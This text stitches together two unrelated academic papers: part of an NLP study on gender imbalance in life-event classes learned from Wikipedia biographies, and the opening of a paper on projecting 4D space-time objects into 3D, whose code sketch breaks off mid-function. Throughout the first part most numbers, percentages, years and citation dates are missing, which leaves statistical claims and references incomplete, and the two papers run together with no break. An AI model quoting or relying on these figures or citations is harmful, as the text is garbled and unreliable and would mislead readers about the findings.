% high school, graduated, attended, graduating, school, born, early life, class, grew . . . % drafted, nfl draft, round, professional career, draft, overall, selected . . . % graduated, bachelor, degree, university, received, college, attended, earned, b. a. . . . % joined, enlisted, army, served, world war ii, united states army, years, corps . . . % law, university, graduated, received, school, law school, degree, law degree . . . % thesis, received, university, phd, dissertation, doctorate, degree, ph. d., completed . . . % citizen, became, citizenship, united states, american, u. s., british, granted, since . . . % divorce, marriage, divorced, married, filed, wife, separated, years, ended, later . . . % university, teaching, professor, college, taught, faculty, school, department, joined . . . % trial, murder, case, court, charges, guilty, jury, judge, death, convicted . . . % died, accident, killed, death, near, crash, car, involved, car accident, injured . . . % prison, released, years, sentence, sentenced, months, parole, federal, serving . . . % governor, candidate, unsuccessful candidate, congress, ran, reelection . . . % bishop, appointed, archbishop, diocese, pope, consecrated, named, cathedral . . . % chairman, board, president, ceo, became, company, directors, appointed, position . . . % awarded, university, received, honorary doctorate, honorary degree, degree, doctor . . . % fame, inducted, hall, sports hall, elected, national, football hall, international . . . % died, hospital, age, death, complications, cancer, home, heart attack, washington . . . % national, historic, park, state, house, named, memorial, home, honor, museum . . . % statue, unveiled, memorial, plaque, anniversary, erected, monument, death, bronze table : salient event classes learned from , wikipedia biographies. all event classes can be viewed at http://www.ark.cs.cmu.edu/bio. k = event classes; as above, we run inference for a burn-in period of iterations and collect samples from the posterior distributions for z (the event class indicator for each event). table illustrates a sample of event classes along with the mean time µ and standard deviation σ, the gender distribution (calculated from the poste- rior distribution over z for all entities whose gender is known ) and the most probable terms in the class. the latent classes that we learn span a mix of ma- jor life events of wikipedia notable figures (includ- ing events that we might characterize as gradu- ating high school, becoming a citizen, di- vorce, being convicted of a crime, and dy- ing) and more fine-grained events (such as be- ing drafted by a sports team and being in- ducted into the hall of fame). emerging immediately from this summary is an imbalance in the gender distribution for many of these event classes. among the , biographies whose gender is known, . % are of women; we would therefore expect around . % of the partic- using our method of gender inference described in § , we are able to infer gender for . % of biographies ( , ). ipants in most event classes to be female. figures and illustrate five of the most highly skewed classes in both directions, ranked according to the z score of a two-tailed binomial proportion test (h = . ). 
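The z-scores used for this ranking come from a two-tailed binomial proportion test of each class's share of women against the overall proportion of women among biographies with known gender. A minimal sketch of such a test, using the usual normal approximation and made-up example numbers, is given below; it is an illustration rather than the paper's analysis code.

```python
import math

def binomial_proportion_ztest(successes, n, p0):
    """One-sample, two-tailed binomial proportion test (normal approximation).

    successes: number of biographies of women assigned to the event class
    n:         total biographies assigned to the class
    p0:        proportion of women expected under the null hypothesis
    Returns (z, two-tailed p-value)."""
    p_hat = successes / n
    z = (p_hat - p0) / math.sqrt(p0 * (1.0 - p0) / n)
    p_value = math.erfc(abs(z) / math.sqrt(2.0))   # = 2 * P(Z > |z|)
    return z, p_value

# Hypothetical class: 300 of 500 members are women, tested against a 15% base rate.
z, p = binomial_proportion_ztest(300, 500, 0.15)
```

Ranking K classes this way implicitly performs K such tests, which is why the Bonferroni correction discussed below matters when judging significance.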
While some of these classes reflect a biased world in which more men are drafted into sports teams, serve in the armed forces, and are ordained as priests, one latent class that calls out for explanation is that surrounding divorce (divorce, marriage, divorced, filed, married, wife, separated, years, ended, later), whose female proportion of . % is nearly triple that of the data overall (and whose z-score reveals it to be strongly statistically different [p ≪ . ] from the H0 mean, even accounting for the Bonferroni correction we must make when considering the K tests we implicitly perform when ranking). While we did not approach this analysis with any a priori hypotheses to test, our unsupervised model reveals an interesting hypothesis to pursue with confirmatory analysis: biographies of women on Wikipedia disproportionately focus on marriage and divorce compared to those of men.

[Table: Female-skewed event classes, ranked by z-score in a two-tailed binomial proportion test. The most frequent terms in these classes are: (1) miss, pageant, title, usa, miss universe, beauty, held, teen, crowned, competed; (2) birth, gave, daughter, son, born, first child, named, wife, announced, baby; (3) fashion, model, show, campaign, week, appeared, face, career, became, modeling; (4) divorce, marriage, divorced, married, filed, wife, separated, years, ended, later; (5) summer olympics, competed, olympics, team, finished, event, final, world championships.]

[Table: Male-skewed event classes, ranked by z-score in a two-tailed binomial proportion test. The most frequent terms in these classes are: (1) drafted, nfl draft, round, professional career, draft, overall, selected, major league baseball; (2) promoted, rank, captain, retired, army, lieutenant, colonel, major, brigadier general; (3) bar, admitted, law, practice, called, commenced, studied, began, career, practiced; (4) infantry, civil war, regiment, army, enlisted, served, company, colonel, captain; (5) ordained, priest, seminary, priesthood, theology, theological, college, studies, rome.]

To test this hypothesis with more traditional means, we estimated the empirical gender proportions of biographies containing terms explicitly denoting divorce (divorced, divorce, divorces and divorcing). The result of this analysis confirms that of the model. Of the , biographies in which at least one of these terms appears, . % are those of a woman, far more than the . % we would expect (in a two-tailed binomial proportion test against H0 = . , this difference is significant at p < . ); this corresponds to divorce being mentioned in . % of all , women's biographies, and . % of all , men's; on average, a woman's biography is . times more likely to mention divorce than a man's.

We repeat the gender proportion experiment with terms denoting marriage (married, marry, marries, marrying and marriage) and find a similar trend: of the , biographies where at least one of these terms is mentioned, . % belong to women; again, in a two-tailed proportion test, this difference is significant at p < . . This corresponds to marriage appearing in . % of all women's biographies, and . % of men's; a woman's biography is . times more likely to mention marriage than a man's.

Additional analyses

The analysis above represents one substantive result that mining life events from biographical data makes possible.
To illustrate the range of other analyses that this method can occasion, we briefly present two other directions that can be pursued: investigating correlations among event classes and the distribution of event classes over historical time.

Correlations among events

In our full model with a logistic normal prior over a document's set of events, correlations among latent event classes are learned during inference. From the covariance matrix Ση, we can directly read off correlations among events; for other models (such as those with a Dirichlet prior), we can infer correlations using the posterior estimates for η. The table below illustrates the event classes that have the highest correlations to the event class defined by family, boss, murder, crime, mafia, became, arrested, john, gang, chicago. The structure that we learn here neatly corresponds to a criminal action frame, with common events for killing, being subject to federal investigation, being arrested and being brought to trial.

[Table: Highest correlations between the family, boss, murder, crime, mafia class and other events. The most correlated classes are: (1) family, boss, murder, crime, mafia, became, arrested, john, gang, chicago; (2) killed, shot, police, home, two, car, arrested, murder, death, -year-old; (3) trial, murder, case, guilty, court, jury, charges, convicted, death, judge; (4) investigation, federal, charges, office, fraud, campaign, state, commission, former, corruption; (5) arrested, sentenced, years, prison, trial, death, court, convicted, military, months.]

Historical distribution of events

The figure below likewise illustrates the distribution over time for a set of learned event classes. While the only notion of time that our model has access to during inference is that of time relative to a person's birth, we can estimate the empirical distribution of event classes in historical time by charting the density plot of their observed absolute dates. Several historically relevant event classes are legible, including serving in the army (with peaks during World War I and II, Vietnam and the later Iraq wars), opera debut (with peaks in the s), NASA (with peaks in the s and the turn of the millennium), joining the communist party (with a rise in the early th century), leading an expedition (with a slow historical decline) and joining a band (with increasing historical presence). Grounding specific life events in history has the potential to enable analysis of how historical time affects the life histories of individuals, including both the influence of the general passage of time, as on transitions to adulthood (Modell et al.; Hogan; Modell), and the influence of specific historical moments like the Great Depression (Elder) or World War II (Mayer; Elder).

[Figure: Historical distributions of event classes, shown as density plots over absolute dates for classes such as "joined, enlisted, army, served, world war ii"; "joined, became, member, party, communist party"; "opera, debut, made, sang, la, role, di, metropolitan opera"; "river, expedition, fort, near, led, territory"; "space, nasa, mission, flight, center, program"; and "band, guitar, bass, formed, album, drums, guitarist".]

Related work

In learning general classes of events from text, our work draws on a rich background spanning several research traditions.
by considering the structure that exists between event classes, we draw on the origi- nal work on procedural scripts and schemas (min- sky, ; schank and abelson, ) and narra- tive chains (chambers and jurafsky, ; cham- bers and jurafsky, ), including more recent ad- vances in the unsupervised learning of frame seman- tic representations (modi et al., ; o’connor, ; cheung et al., ; chambers, ). in learning latent classes from text, our work is also clearly related to research on topic modeling (blei et al., ; griffiths and steyvers, ). this work differs from that tradition by scoping our data only over text that we have reason to be- lieve describes events (by including absolute dates). while other topic models have leveraged temporal information in the learning of latent topics, such as the dynamic topic model (blei and lafferty, b; wang et al., ) and “topics over time” (wang and mccallum, ), our model is the first to in- fer classes of events whose contours are shaped by the time in a person’s life that they take place. while the information extraction tasks of template filling (hobbs et al., ) and relation detection (banko et al., ; fader et al., ; carlson et al., ) generally fall into a paradigm of classifying text segments into a predetermined ontology, they too have been informed by unsupervised approaches to learning relation classes (yao et al., ) and events (ritter et al., ). our work here differs from this past work in leveraging explicit absolute temporal information in the unsupervised learning of event classes (and their structure). reasoning about the temporal ordering of events likewise has a long tradition of its own, both in nlp (pustejovsky et al., ; mani et al., ; verhagen et al., ; chambers et al., ) and information extraction (talukdar et al., ). rather than attempting to model the ordering of events relative to each other, we focus instead on their occurrence relative to the beginning of a person’s life. wikipedia likewise has been used extensively in nlp; wikipedia biographies in particular have been used for the task of training summarization models (biadsy et al., ), recognizing biographical sen- tences (conway, ), learning correlates of “suc- cess” (ng, ), and disambiguating named enti- ties (bunescu and pasca, ; cucerzan, ). in our work in mining biographical structure from it, we draw on previous research into automatically uncovering latent structure in resumés (mimno and mccallum, a) and approaches to learning life path trajectories from categorical survey data (mas- soni et al., ; ritschard et al., ). in using wikipedia as a dataset for analysis, we must note that the subjects of biographies are not a representative sample of the population, nor are their contents unbiased representations. nearly all ency- clopedias necessarily prefer the historically notori- ous (if due to nothing else than inherent biases in the preservation of historical records); many, like wiki- pedia, also have disproportionately low coverage of women, minorities, and other demographic groups, in part because of biases in community member- ship. estimates of the percentage of female edi- tors on wikipedia, for example, ranges from % to . % (collier and bear, ; reagle and rhue, ; cassell, ; hill and shaw, ; wiki- pedia, ). 
different language editions of wiki- pedia have a natural geographic bias in article se- lection (hecht and gergle, ), with each empha- sizing their own “local heroes” (kolbitsch and mau- rer, ), and also differ in the kind of information they present (pfeil et al., ; callahan and her- ring, ). this extends to selection of biographies as well, with one study finding approximately % of sampled biographies being those of women (reagle and rhue, ), a figure very close to the . % we observe in our analysis here. conclusion we present a method for mining life events from biographies, leveraging the correlation structure of event descriptions. unlike prior work that has fo- cused on inferring “life trajectories” from categor- ical survey data, we learn relevant structure in an unsupervised manner directly from text, opening the door to applying this method to a broad set of biogra- phies beyond wikipedia (including full-text books from the internet archive or hathi trust, and other encyclopedic biographies as well). in a quantitative analysis, the model we present outperforms a strong baseline at the task of event time prediction, and sur- faces a substantive qualitative distinction in the con- tent of the biographies of men and women on wiki- pedia: in contrast to previous work that uses com- putational methods to measure a difference in cov- erage, we show that such methods are able to tease apart differences in characterization as well. while the task of event time prediction provides a quantitative means to compare different models, we expect the real application of this work will lie in the latent event classes themselves, and the in- formation they provide both about the subjects and authors of biographies. latent topics have provided one way of organizing large document collections in the past (mimno and mccallum, b); in ad- dition to occasioning data analysis of the kind we describe here, we expect that personal event classes can have a practical application in helping to orga- nize data describing people as well. data and code to support this work, including an interface to ex- plore event classes in wikipedia, can be found at http://www.ark.cs.cmu.edu/bio/. acknowledgments we thank the anonymous reviewers, along with dallas card, brendan o’connor, bryan routledge, yanchuan sim and ted underwood, for their help- ful comments. the research reported in this arti- cle was supported by u.s. national science foun- dation grant career iis- to n.a.s. and google’s support of the reading is believing project at cmu. this work was made possible through the use of computing resources made available by the open science data cloud (osdc), an open cloud consortium (occ)-sponsored project. references david bamman, ted underwood, and noah a. smith. . a bayesian mixed effects model of literary character. in acl. michele banko, michael j cafarella, stephen soderland, matthew broadhead, and oren etzioni. . open information extraction for the web. in ijcai, vol- ume , pages – . fadi biadsy, julia hirschberg, and elena filatova. . an unsupervised approach to biography production using wikipedia. in acl ’ , pages – . david m. blei and john d. lafferty. a. correlated topic models. in nips ’ . david m. blei and john d. lafferty. b. dynamic topic models. in icml ’ , pages – . david m. blei and john d. lafferty. . a correlated topic model of science. aas, ( ): – . david m. blei, andrew ng, and michael jordan. . latent dirichlet allocation. jmlr, : – . razvan bunescu and marius pasca. . 
using ency- clopedic knowledge for named entity disambiguation. in eacl ’ , pages – , trento, italy. ewa s. callahan and susan c. herring. . cultural bias in wikipedia content on famous persons. j. am. soc. inf. sci. technol., ( ): – , october. andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r. hruschka jr., and tom m. mitchell. . toward an architecture for never- ending language learning. in aaai ’ . bob carpenter. . integrating out multinomial parameters in latent dirichlet allocation and naive bayes for collapsed gibbs sampling. technical re- port, lingpipe. justine cassell. . editing wars behind the scenes. new york times, february . nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative event chains. in acl ’ . nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative schemas and their partici- pants. in acl ’ , pages – . nathanael chambers, shan wang, and dan jurafsky. . classifying temporal relations between events. in proceedings of the th annual meeting of the acl on interactive poster and demonstration sessions, acl ’ , pages – , stroudsburg, pa, usa. as- sociation for computational linguistics. nathanael chambers. . event schema induction with a probabilistic entity-driven model. in emnlp ’ , pages – , seattle, washington, usa, oc- tober. association for computational linguistics. jackie chi kit cheung, hoifung poon, and lucy van- derwende. . probabilistic frame induction. in naacl ’ , pages – , atlanta, georgia, june. association for computational linguistics. benjamin collier and julia bear. . conflict, criti- cism, or confidence: an empirical examination of the gender gap in wikipedia contributions. in cscw ’ . mike conway. . mining a corpus of biographical texts using keywords. literary and linguistic com- puting, ( ): – . silviu cucerzan. . large-scale named entity dis- ambiguation based on wikipedia data. in emnlp- conll, volume , pages – . peter t. davis, david k. elson, and judith l. klavans. . methods for precise named entity matching in digital collections. in jcdl ’ . glen elder. . children of the great depression. university of chicago press. glen elder. . talent, history, and the fulfillment of promise. psychiatry, ( ): – . david k. elson, nicholas dames, and kathleen r. mck- eown. . extracting social networks from literary fiction. in acl ’ , pages – . anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information ex- traction. in emnlp ’ , emnlp ’ , pages – , stroudsburg, pa, usa. association for compu- tational linguistics. jenny rose finkel, trond grenager, and christopher manning. . incorporating non-local informa- tion into information extraction systems by gibbs sam- pling. in acl ’ , pages – . google. . freebase data dumps. https:// developers.google.com/freebase/data. thomas l griffiths and mark steyvers. . find- ing scientific topics. proceedings of the national academy of sciences of the united states of america, (suppl ): – . brent hecht and darren gergle. . measuring self-focus bias in community-maintained knowledge repositories. in c&t ’ , pages – . benjamin mako hill and aaron shaw. . the wiki- pedia gender gap revisited: characterizing survey re- sponse bias with propensity score estimation. plos one, ( ). jerry r hobbs, douglas appelt, john bear, david israel, megumi kameyama, and mabry tyson. . fas- tus: a system for extracting information from text. in proceedings of the workshop on human language technology, pages – . 
association for compu- tational linguistics. dennis p. hogan and nan marie astone. . the transition to adulthood. annual review of sociology, ( ): – . dennis hogan. . transitions and social change: the early lives of american men. academic, new york. john s justeson and slava m katz. . technical ter- minology: some linguistic properties and an algorithm for identification in text. natural language engineer- ing, ( ): – . josef kolbitsch and hermann a. maurer. . the transformation of the web: how emerging commu- nities shape the information we consume. j. ucs, ( ): – . lee a. lillard and linda j. waite. . a joint model of marital childbearing and marital disruption. demogra- phy, ( ):pp. – . lee a. lillard, michael j. brien, and linda j. waite. . premarital cohabitation and subsequent marital dissolution: a matter of self-selection? demography, ( ):pp. – . inderjeet mani, marc verhagen, ben wellner, chong min lee, and james pustejovsky. . machine learning of temporal relations. in proceedings of the st in- ternational conference on computational linguistics and the th annual meeting of the association for computational linguistics, acl- , pages – , stroudsburg, pa, usa. association for computational linguistics. sébastien massoni, madalina olteanu, and patrick rous- set. . career-path analysis using optimal match- ing and self-organizing maps. in wsom ’ . henry colin gray matthew and brian harrison. . the oxford dictionary of national biography. oxford university press. karl ulrich mayer. . german survivors of world war ii: the impact on the life course of the collective experience of birth cohorts. in social structure and human lives, newbury park. sage. david mimno and andrew mccallum. a. model- ing career path trajectories. technical report - , university of massachusetts, amherst. david mimno and andrew mccallum. b. organiz- ing the oca: learning faceted subjects from a library of digital books. in jcdl ’ , pages – , new york, ny, usa. acm. david mimno, hanna m. wallach, and andrew mccal- lum. . gibbs sampling for logistic normal topic models with graph-based priors. in nips workshop on analyzing graphs. marvin minsky. . a framework for representing knowledge. technical report, mit-ai laboratory. john modell, frank f. furstenberg jr., and theodore her- shberg. . social change and transitions to adult- hood in historical perspective. journal of family his- tory, ( ): – . john modell. . normative aspects of american mar- riage timing since world war ii. journal of family history, ( ): – . ashutosh modi, ivan titov, and alexandre klemen- tiev. . unsupervised induction of frame-semantic representations. in proceedings of the naacl-hlt workshop on the induction of linguistic structure, wils ’ , pages – , stroudsburg, pa, usa. asso- ciation for computational linguistics. radford m neal. . slice sampling. annals of statis- tics, pages – . pauline ng. . what kobe bryant and britney spears have in common: mining wikipedia for characteristics of notable individuals. in icwsm ’ . brendan o’connor. . learning frames from text with an unsupervised latent variable model. arxiv, abs/ . . ulrike pfeil, panayiotis zaphiris, and chee siang ang. . cultural differences in collaborative authoring of wikipedia. journal of computer-mediated com- munication, ( ): – . james pustejovsky, patrick hanks, roser sauri, andrew see, robert gaizauskas, andrea setzer, dragomir radev, beth sundheim, david day, lisa ferro, et al. . the timebank corpus. in corpus linguistics, volume , page . joseph reagle and lauren rhue. 
submitted march accepted june published july
corresponding author ken arroyo ohori, g.a.k.arroyoohori@tudelft.nl
academic editor sándor szénási
additional information and declarations can be found at the end of the article. doi . /peerj-cs.
copyright arroyo ohori et al. distributed under creative commons cc-by. open access

visualising higher-dimensional space-time and space-scale objects as projections to R^3
ken arroyo ohori, hugo ledoux and jantien stoter
3d geoinformation, delft university of technology, delft, netherlands

abstract
objects of more than three dimensions can be used to model geographic phenomena that occur in space, time and scale. for instance, a single 4d object can be used to represent the changes in a 3d object's shape across time or all its optimal representations at various levels of detail. in this paper, we look at how such higher-dimensional space-time and space-scale objects can be visualised as projections from R^4 to R^3. we present three projections that we believe are particularly intuitive for this purpose: (i) a simple 'long axis' projection that puts 3d objects side by side; (ii) the well-known orthographic and perspective projections; and (iii) a projection to a 3-sphere (S^3) followed by a stereographic projection to R^3, which results in an inwards-outwards fourth axis. our focus is in using these projections from R^4 to R^3, but they are formulated from R^n to R^(n-1) so as to be easily extensible and to incorporate other non-spatial characteristics.
we present a prototype interactive visualiser that applies these projections from 4d to 3d in real-time using the programmable pipeline and compute shaders of the metal graphics api.

subjects graphics, scientific computing and simulation, spatial and geographic information systems
keywords projections, space-time, space-scale, 4d visualisation, nd gis

background
projecting the 3d nature of the world down to two dimensions is one of the most common problems at the juncture of geographic information and computer graphics, whether as the map projections in both paper and digital maps (snyder, ; grafarend & you, ) or as part of an interactive visualisation of a 3d city model on a computer screen (foley & nielson, ; shreiner et al., ). however, geographic information is not inherently limited to objects of three dimensions. non-spatial characteristics such as time (hägerstrand, ; güting et al., ; hornsby & egenhofer, ; kraak, ) and scale (meijers, a) are often conceived and modelled as additional dimensions, and objects of three or more dimensions can be used to model objects in 2d or 3d space that also have changing geometries along these non-spatial characteristics (van oosterom & stoter, ; arroyo ohori, ). for example, a single 4d object can be used to represent the changes in a 3d object's shape across time (arroyo ohori, ledoux & stoter, ) or all the best representations of a 3d object at various levels of detail (luebke et al., ; van oosterom & meijers, ; arroyo ohori et al., a; arroyo ohori, ledoux & stoter, c).

figure: a 4d model of a house at two levels of detail and all the equivalences between its composing elements is a polychoron bounded by: (a) volumes representing the house at the two levels of detail, (b) a pyramidal volume representing the window at the higher lod collapsing to a vertex at the lower lod, (c) a pyramidal volume representing the door at the higher lod collapsing to a vertex at the lower lod, and a roof volume bounded by (a) the roof faces of the two lods, (b) the ridges at the lower lod collapsing to the tip at the higher lod and (c) the hips at the higher lod collapsing to the vertex below them at the lower lod. (d) a 3d cross-section of the model obtained at the middle point along the lod axis.

objects of more than three dimensions can be however unintuitive (noll, ; frank, ), and visualising them is a challenge. while some operations on a higher-dimensional object can be achieved by running automated methods (e.g. certain validation tests or area/volume computations) or by visualising only a chosen 2d or 3d subset (e.g. some of its bounding faces or a cross-section), sometimes there is no substitute for being able to view a complete nd object, much like viewing floor or façade plans is often no substitute for interactively viewing the complete 3d model of a building. by viewing a complete model, one can see at once the 3d objects embedded in the model at every point in time or scale as well as the equivalences and topological relationships between their constituting elements. more directly, it also makes it possible to get an intuitive understanding of the complexity of a given 4d model. for instance, in fig. we show an example of a 4d model representing a house at two different levels of detail and all the equivalences between its composing elements. it forms a valid manifold 4-cell (arroyo ohori, damiand & ledoux, ), allowing it to be represented using data structures such as a 4d generalised or combinatorial map. this paper thus looks at a key aspect that allows higher-dimensional objects to be visualised interactively, namely how to project higher-dimensional objects down to fewer dimensions.

while there is previous research on the visualisation of higher-dimensional objects, we aim to do so in a manner that is reasonably intuitive, implementable and fast. we therefore discuss some relevant practical concerns, such as how to also display edges and vertices and how to use compute shaders to achieve good framerates in practice. in order to do this, we first briefly review the most well-known transformations (translation, rotation and scale) and the cross-product in nd, which we use as fundamental operations in order to project objects and to move around the viewer in an nd scene. afterwards, we show how to apply three different projections from R^n to R^(n-1) and argue why we believe they are intuitive enough for real-world use. these can be used to project objects from R^4 to R^3, and if necessary, they can be used iteratively in order to bring objects of any dimension down to 3d or 2d. we thus present: (i) a simple 'long axis' projection that stretches objects along one custom axis while preserving all other coordinates, resulting in 3d objects that are presented side by side; (ii) the orthographic and perspective projections, which are analogous to those used from 3d to 2d; and (iii) an inwards/outwards projection to an (n-1)-sphere followed by a stereographic projection to R^(n-1), which results in a new inwards-outwards axis. we present a prototype that applies these projections from 4d to 3d and then applies a standard perspective projection down to 2d. we also show that with the help of low-level graphics apis, all the required operations can be applied at interactive framerates for the 4d to 3d case. we finish with a discussion of the advantages and disadvantages of this approach.

higher-dimensional modelling of space, time and scale
there are a great number of models of geographic information, but most consider space, time and scale separately. for instance, space can be modelled using primitive instancing (foley et al., ; kada, ), constructive solid geometry (requicha & voelcker, ) or various boundary representation approaches (muller & preparata, ; guibas & stolfi, ; lienhardt, ), among others. time can be modelled on the basis of snapshots (armstrong, ; hamre, mughal & jacob, ), space-time composites (peucker & chrisman, ; chrisman, ), events (worboys, ; peuquet, ; peuquet & duan, ), or a combination of all of these (abiteboul & hull, ; worboys, hearnshaw & maguire, ; worboys, ; wachowicz & healy, ).
scale is usually modelled based on independent datasets at each scale (buttenfield & delotto, ; friis-christensen & jensen, ; meijers, b), although approaches to combine them into single datasets (gröger et al., ) or to create progressive and continuous representations also exist (ballard, ; jones & abraham, ; günther, ; van oosterom, ; filho et al., ; rigaux & scholl, ; plümer & gröger, ; van oosterom, ).

as an alternative to all these methods, it is possible to represent any number of parametrisable characteristics (e.g. two or three spatial dimensions, time and scale) as additional dimensions in a geometric sense, modelling them as orthogonal axes such that real-world 2d-3d entities are modelled as higher-dimensional objects embedded in higher-dimensional space. these objects can be consequently stored using higher-dimensional data structures and representation schemes (Čomić & de floriani, ; arroyo ohori, ledoux & stoter, b). possible approaches include incidence graphs (rossignac & o'connor, ; masuda, ; sohanpanah, ; hansen & christensen, ), nef polyhedra (bieri & nef, ), and ordered topological models (brisson, ; lienhardt, ). this is consistent with the basic tenets of n-dimensional geometry (descartes, ; riemann, ) and topology (poincaré, ), which means that it is possible to apply a wide variety of computational geometry and topology methods to these objects. in a practical sense, 4d topological relationships between 4d objects provide insights that 3d topological relationships cannot (arroyo ohori, boguslawski & ledoux, ). also, mckenzie, williamson & hazelton ( ) contend that weather and groundwater phenomena cannot be adequately studied in less than four dimensions, and van oosterom & stoter ( ) argue that the integration of space, time and scale into a 5d model for gis can be used to ease data maintenance and improve consistency, as algorithms could detect if the 5d representation of an object is self-consistent and does not conflict with other objects.

basic transformations and the cross-product in nd
the basic transformations (translation, scale and rotation) have a straightforward definition in n dimensions, which can be used to move and zoom around a scene composed of nd objects. in addition, the n-dimensional cross-product can be used to obtain a new vector that is orthogonal to a set of other n-1 vectors in R^n. we use these operations as a base for nd visualisation; they are thus described briefly below.

the translation of a set of points in R^n can be easily expressed as a sum with a vector $t = [t_1, \ldots, t_n]$, or alternatively as a multiplication with a matrix using homogeneous coordinates (a coordinate system based on projective geometry and typically used in computer graphics; an additional coordinate indicates a scale factor that is applied to all other coordinates), which is an $(n+1) \times (n+1)$ matrix defined as:

\[
T = \begin{bmatrix}
1 & 0 & \cdots & 0 & t_1 \\
0 & 1 & \cdots & 0 & t_2 \\
\vdots & \vdots & \ddots & \vdots & \vdots \\
0 & 0 & \cdots & 1 & t_n \\
0 & 0 & \cdots & 0 & 1
\end{bmatrix}.
\]

scaling is similarly simple. given a vector $s = [s_1, s_2, \ldots, s_n]$ that defines a scale factor per axis (which in the simplest case can be the same for all axes), it is possible to define a matrix to scale an object as:

\[
S = \begin{bmatrix}
s_1 & 0 & \cdots & 0 \\
0 & s_2 & \cdots & 0 \\
\vdots & \vdots & \ddots & \vdots \\
0 & 0 & \cdots & s_n
\end{bmatrix}.
\]
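to make the two matrices above concrete, the following is a minimal numpy sketch; the function names and example values are ours and not part of the paper's prototype:

```python
import numpy as np

def translation_matrix(t):
    """(n+1) x (n+1) homogeneous matrix that translates n-d points by the vector t."""
    n = len(t)
    m = np.eye(n + 1)
    m[:n, n] = t                              # translation components go in the last column
    return m

def scaling_matrix(s):
    """n x n diagonal matrix that scales each axis i by s[i]."""
    return np.diag(s)

# example: translate and scale a 4d point
p = np.array([1.0, 2.0, 3.0, 4.0])
t = translation_matrix([10.0, 0.0, 0.0, -5.0])
p_h = np.append(p, 1.0)                       # homogeneous coordinates
print((t @ p_h)[:4])                          # -> [11.  2.  3. -1.]
print(scaling_matrix([2.0, 2.0, 1.0, 0.5]) @ p)
```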
rotation is somewhat more complex. rotations in 3d are often conceptualised intuitively as rotations around the x, y and z axes. however, this view of the matter is only valid in 3d. in higher dimensions, it is necessary to consider instead rotations parallel to a given plane (hollasch, ), such that a point that is continuously rotated (without changing the rotation direction) will form a circle that is parallel to that plane. this view is valid in 2d (where there is only one such plane), in 3d (where a plane is orthogonal to the usually defined axis of rotation) and in any higher dimension. incidentally, this shows that the degree of rotational freedom in nd is given by the number of possible combinations of two axes (which define a plane) on that dimension (hanson, ), i.e. $\binom{n}{2}$.

thus, in a 4d coordinate system defined by the axes x, y, z and w, it is possible to define six 4d rotation matrices, which correspond to the six rotational degrees of freedom in 4d (hanson, ). these respectively rotate points in R^4 parallel to the xy, xz, xw, yz, yw and zw planes:

\[
R_{xy} = \begin{bmatrix} \cos\theta & -\sin\theta & 0 & 0 \\ \sin\theta & \cos\theta & 0 & 0 \\ 0 & 0 & 1 & 0 \\ 0 & 0 & 0 & 1 \end{bmatrix}
\quad
R_{xz} = \begin{bmatrix} \cos\theta & 0 & -\sin\theta & 0 \\ 0 & 1 & 0 & 0 \\ \sin\theta & 0 & \cos\theta & 0 \\ 0 & 0 & 0 & 1 \end{bmatrix}
\quad
R_{xw} = \begin{bmatrix} \cos\theta & 0 & 0 & -\sin\theta \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 1 & 0 \\ \sin\theta & 0 & 0 & \cos\theta \end{bmatrix}
\]
\[
R_{yz} = \begin{bmatrix} 1 & 0 & 0 & 0 \\ 0 & \cos\theta & -\sin\theta & 0 \\ 0 & \sin\theta & \cos\theta & 0 \\ 0 & 0 & 0 & 1 \end{bmatrix}
\quad
R_{yw} = \begin{bmatrix} 1 & 0 & 0 & 0 \\ 0 & \cos\theta & 0 & -\sin\theta \\ 0 & 0 & 1 & 0 \\ 0 & \sin\theta & 0 & \cos\theta \end{bmatrix}
\quad
R_{zw} = \begin{bmatrix} 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & \cos\theta & -\sin\theta \\ 0 & 0 & \sin\theta & \cos\theta \end{bmatrix}.
\]

the n-dimensional cross-product is easy to understand by first considering the lower-dimensional cases. in 2d, it is possible to obtain a normal vector to a 1d line as defined by two (different) points $p_0$ and $p_1$, or equivalently a normal vector to a vector from $p_0$ to $p_1$. in 3d, it is possible to obtain a normal vector to a 2d plane as defined by three (non-collinear) points $p_0$, $p_1$ and $p_2$, or equivalently a normal vector to a pair of vectors from $p_0$ to $p_1$ and from $p_0$ to $p_2$. similarly, in nd it is possible to obtain a normal vector to an (n-1)d subspace, probably easier to picture as an (n-1)-simplex, as defined by n linearly independent points $p_0, p_1, \ldots, p_{n-1}$, or equivalently a normal vector to a set of n-1 vectors from $p_0$ to every other point (i.e., $p_1, p_2, \ldots, p_{n-1}$) (massey, ; elduque, ). hanson ( ) follows the latter explanation using a set of n-1 vectors all starting from the first point to give an intuitive definition of the n-dimensional cross-product. assuming that a point $p_i$ in R^n is defined by a tuple of coordinates denoted as $(p^i_0, p^i_1, \ldots, p^i_{n-1})$ and a unit vector along the i-th dimension is denoted as $\hat{x}_i$, the n-dimensional cross-product $\mathbf{e}_n$ of a set of points $p_0, p_1, \ldots, p_{n-1}$ can be expressed compactly as the cofactors of the last column in the following determinant:

\[
\mathbf{e}_n = \begin{vmatrix}
(p^1_0 - p^0_0) & (p^2_0 - p^0_0) & \cdots & (p^{n-1}_0 - p^0_0) & \hat{x}_0 \\
(p^1_1 - p^0_1) & (p^2_1 - p^0_1) & \cdots & (p^{n-1}_1 - p^0_1) & \hat{x}_1 \\
\vdots & \vdots & \ddots & \vdots & \vdots \\
(p^1_{n-1} - p^0_{n-1}) & (p^2_{n-1} - p^0_{n-1}) & \cdots & (p^{n-1}_{n-1} - p^0_{n-1}) & \hat{x}_{n-1}
\end{vmatrix}.
\]

the components of the normal vector $\mathbf{e}_n$ are thus given by the minors of the unit vectors $\hat{x}_0, \hat{x}_1, \ldots, \hat{x}_{n-1}$. this vector $\mathbf{e}_n$, like all other vectors, can be normalised into a unit vector by dividing it by its norm $\|\mathbf{e}_n\|$.
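a small numpy sketch of both operations, using the same cofactor convention as the determinant above (the names are ours; only the handedness of the resulting vector depends on the chosen sign convention):

```python
import numpy as np

def rotation_matrix(n, i, j, theta):
    """n x n rotation by theta parallel to the plane spanned by axes i and j."""
    m = np.eye(n)
    c, s = np.cos(theta), np.sin(theta)
    m[i, i], m[i, j] = c, -s
    m[j, i], m[j, j] = s, c
    return m

def cross_product_nd(points):
    """normal vector to the (n-1)-simplex given by n points in R^n,
    computed as the cofactors of the last column of the determinant above."""
    points = np.asarray(points, dtype=float)
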